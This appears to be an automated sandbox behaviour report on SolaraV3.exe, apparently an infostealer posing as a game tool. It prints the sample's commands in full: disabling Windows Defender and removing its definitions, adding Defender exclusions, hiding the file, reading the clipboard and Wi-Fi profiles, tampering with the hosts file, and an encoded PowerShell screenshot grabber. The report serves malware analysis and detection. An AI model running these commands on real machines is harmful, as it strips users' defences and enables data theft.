Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3888:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03

Source: C:\Users\user\Desktop\SolaraV3.exe

File created: C:\Users\user~1\AppData\Local\Temp\_MEI28842

Jump to behavior

Source: SolaraV3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\SolaraV3.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SolaraV3.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: SolaraV3.exe

ReversingLabs: Detection: 55%

Source: SolaraV3.exe	String found in binary or memory: set-addPolicy
Source: SolaraV3.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\SolaraV3.exe

File read: C:\Users\user\Desktop\SolaraV3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
